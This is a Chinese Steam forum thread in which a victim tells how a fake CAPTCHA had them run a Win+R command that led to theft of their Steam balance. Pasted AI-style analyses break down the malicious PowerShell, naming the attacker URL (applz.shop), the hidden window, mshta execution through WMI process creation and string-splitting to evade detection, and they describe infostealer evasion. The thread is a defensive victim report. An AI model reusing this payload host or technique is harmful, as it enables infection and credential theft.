steam吧 关注:4,632,805贴子:72,173,071

家被偷了。逐开贴记录这次经历,让我们看看事情的后续会如何。

只看楼主收藏回复

我不知道为什么会这样,最近没有在网吧登陆过,最近的几次联机游戏基本上只玩过阿尔比恩OL,不过有几次交易记录。又或者,其实是有认识的人故意想报复我?
我的手机是开启了令牌的,但是这样对于在市场上的购买不会起到保护作用吗?




IP属地:湖北1楼2025-02-18 15:31回复
    我突然想起来今日下载资源的时候,弹出一个Anti机器人验证,需要我输入Win+R和一串链接,当时我看着以为不是什么奇怪的链接所以照做了,很可能是这个原因导致计算机遭到了感染。
    还有,我的邮箱反馈Discord的账户也遭到了禁用,也可能是出于感染了病毒?这让我想到前几个月我的Red迪账户莫名遭到了封禁,同样可能是出于感染了病毒。


    IP属地:湖北2楼2025-02-18 15:39
    回复
      肯定是win+R输入的问题,这个验证我看到过其他人中招


      IP属地:广东来自Android客户端3楼2025-02-18 15:56
      收起回复
        Win+R,当时之后用360快速地查杀了一下,但是没有发现问题。当然,我现在正在全盘查杀。
        试着Win+V打开剪切板找找当时输入的链接,但是出于最近用得太频繁了没能找到,不过我想到了浏览器历史浏览记录......


        IP属地:湖北4楼2025-02-18 16:15
        回复
          凶手。
          网址前缀是:objectstorage.ap-seoul-1.oraclecloud
          记事本里的是粘贴的链接。


          IP属地:湖北5楼2025-02-18 16:22
          回复
            根据您提供的PowerShell命令分析,这段代码具有明显的恶意行为特征,需要立即采取措施进行清理。以下是对该命令的详细解读及应对建议:
            一、代码行为分析
            隐藏窗口执行
            -w 1 参数表示 -WindowStyle Hidden,将PowerShell窗口隐藏,避免用户察觉恶意活动29。
            远程下载并执行恶意文件
            $l='https://applz.shop/aowal.mov':定义了一个可疑的URL,虽然扩展名为 .mov(视频文件),但实际可能伪装为恶意脚本或可执行文件29。
            Invoke-CimMethod -ClassName Win32_Process -MethodName Create:通过调用系统管理接口 Win32_Process,创建新进程。此处拼接了 mshta.exe(微软HTML应用程序执行器)和远程URL,目的是通过 mshta.exe 执行远程HTA(HTML Application)文件。HTA文件可运行VBScript/JScript代码,具有较高权限,常用于恶意攻击910。
            绕过检测的混淆手法
            命令中使用了字符串拼接 ('ms' + 'hta' + '.exe'),目的是规避基于字符串匹配的安全检测规则710。
            附加的 # ✅ ''I am not a robot... 可能是迷惑用户的伪装信息,降低怀疑9。
            二、清理与防御措施
            ......


            IP属地:湖北6楼2025-02-18 16:46
            回复
              winR的问题,这就是命令电脑执行一个程序


              IP属地:浙江来自iPhone客户端7楼2025-02-18 17:02
              回复
                安装软件扫描病毒的时候物品仍然在被出售......
                重启了电脑。全盘扫描后也不知道威胁清没清除。我希望事件已经停息了。


                IP属地:湖北8楼2025-02-18 18:33
                回复
                  可以确定洗余额的事件发生在PC仍未开机处于休眠状态的情况下,在事件查看器中找不到与PowerShell有关的相关信息。



                  IP属地:湖北9楼2025-02-18 19:27
                  回复
                    客服为何不回答我?算了,那就让恶人继续逍遥法外吧。


                    IP属地:湖北10楼2025-02-19 03:09
                    回复


                      IP属地:湖北11楼2025-02-19 14:27
                      回复
                        没有结束。我明明全盘扫描过也重启过,为什么!?


                        IP属地:湖北12楼2025-02-20 22:02
                        回复
                          一声警告声之后,卡巴斯基卡死了。重启吧。


                          IP属地:湖北13楼2025-02-20 22:49
                          回复
                            我很想把病毒程序找出来,用事件查看器或是PowerShell找任务但始终无果。
                            无意间重置了手机令牌,这说明病毒程序15天内已经无法从我这里获取到余额了。
                            我不能放心,也许潜伏。


                            IP属地:湖北14楼2025-02-21 00:45
                            收起回复
                              任务管理器中找不到任何异常,加上病毒会在此电脑不在线的时候工作,再加上电脑杀毒软件也找不到任何异常,这是否说明其实病毒的原型其实是一个密码/令牌盗用程序,在取得信息/令牌后就不再工作了,只是为了将数据发送给其它服务器,以至于目的是帮助我的电脑以外的恶意程序的服务器工作?或者还有其它解释吗?
                              ---
                              已深度思考(用时 29 秒)
                              好的,用户现在遇到了一个复杂的情况:任务管理器里找不到异常进程,病毒似乎在电脑离线时活动,杀毒软件也没检测到问题。用户怀疑这可能是一个窃取密码或令牌的程序,一旦得手就不再活动,只是将数据发送到外部服务器,或者有其他可能性。我需要仔细分析用户的问题,并给出合理的解释和建议。
                              首先,用户的描述中有几个关键点:
                              1. 任务管理器中没有异常进程。
                              2. 病毒在电脑离线时工作。
                              3. 杀毒软件未检测到异常。
                              4. 怀疑是密码/令牌盗用程序,数据外传后停止活动,或协助外部服务器。
                              我需要考虑这些现象的可能原因。首先,用户提到的病毒在离线时工作,这可能存在误解,因为严格来说,电脑离线时无法发送数据。但用户提到Steam余额是在电脑休眠时损失的,这可能涉及两种情况:要么病毒在休眠前已窃取信息,攻击者之后在其他设备上使用;要么用户混淆了休眠和睡眠模式,在睡眠模式下,电脑可能仍保持部分网络功能,允许恶意程序活动。
                              接下来,任务管理器和杀毒软件未发现异常,这可能意味着恶意程序使用了高级隐藏技术,如Rootkit、无文件攻击或进程注入,这些技术可以规避传统检测手段。此外,信息窃取型恶意软件可能在完成数据收集后自我删除,避免留下痕迹,这也解释了为何找不到异常进程。
                              用户提到的窃取令牌后停止活动的情况确实存在可能。例如,RedLine或Vidar这类信息窃取木马,专门收集敏感数据后外传,之后不再活跃。但需要进一步验证,比如检查网络日志、系统日志,确认是否有异常外连或进程创建事件。
                              可能的其他解释包括:
                              - **供应链攻击**:恶意软件通过合法软件更新渠道进入系统,难以被检测。
                              - **固件/硬件级恶意软件**:存在于UEFI或硬盘固件中,传统扫描难以发现。
                              - **无文件恶意软件**:利用合法系统工具(如PowerShell、WMI)执行恶意操作,不留下可执行文件。
                              用户可能需要更高级的检测工具,如Sysinternals套件中的Process Explorer、Autoruns,或者使用网络流量分析工具如Wireshark来监控异常连接。此外,检查系统日志、注册表启动项、计划任务等,寻找隐藏的持久化机制。
                              在建议用户采取进一步措施时,需要指导他们如何彻底检查系统,包括使用专杀工具、检查网络流量、分析系统日志,以及在必要时进行系统重装。同时,强调账户安全措施的重要性,如启用多因素认证、定期更改密码、监控账户活动等。
                              总结来说,用户的怀疑是有道理的,但需要更深入的调查来确认。作为回答,应详细列出可能的情况,并提供具体的检查步骤和解决方案,帮助用户彻底排查问题并采取防护措施。
                              一、病毒行为模式的合理解释
                              根据您的描述(任务管理器无异常、离线时段资金损失、杀毒软件无告警),病毒更可能属于 “信息窃取型恶意软件(Infostealer)” ,其核心行为模式为 “潜伏窃密-数据外传-自我销毁” 。以下是具体分析:
                              1. 信息窃取型病毒的核心特征
                              阶段性运作:
                              病毒仅在初次感染时执行完整攻击链(如窃取Steam令牌、浏览器Cookie、密码管理器数据库),随后通过 计划任务或WMI事件订阅 触发自毁脚本,清除自身文件及注册表痕迹,仅保留外传的数据通道。
                              轻量化驻留:
                              为避免触发杀毒软件的行为检测,此类病毒常通过以下方式实现“无实体化”驻留:
                              内存注入:将恶意代码注入 explorer.exe、svchost.exe 等系统进程;
                              无文件攻击:利用PowerShell或MSHTA直接执行远程脚本(如您最初提供的命令);
                              合法服务伪装:修改 TeamViewer、AnyDesk 等远程工具配置,建立隐蔽隧道。
                              2. 离线时段攻击的实现逻辑
                              实际并非“离线”:
                              严格意义上的“离线”指计算机完全断电且无网络连接,此时病毒无法运作。您遇到的更可能是以下两种情况:
                              休眠前已完成数据窃取:攻击者在获取Steam会话令牌后,在其他设备(如海外VPS)上登录您的账户消费;
                              混淆休眠与睡眠模式:若电脑处于睡眠状态(保持内存供电),病毒可能通过 网络唤醒(Wake-on-LAN) 或 RTC定时唤醒 恢复联网并传输数据。
                              3. 杀毒软件失效的原因
                              签名绕过:病毒使用未公开的0day漏洞或商业级混淆器(如VMProtect),绕过特征码检测;
                              供应链污染:通过劫持合法软件更新渠道(如Chrome插件、Steam创意工坊模组)植入恶意代码,利用白名单信任机制;
                              短暂驻留:在杀毒软件扫描前已自毁,仅残留网络通信模块(如隐藏的SSH反向隧道)。
                              二、技术验证与深度取证方法
                              ......


                              IP属地:湖北15楼2025-02-21 01:42
                              回复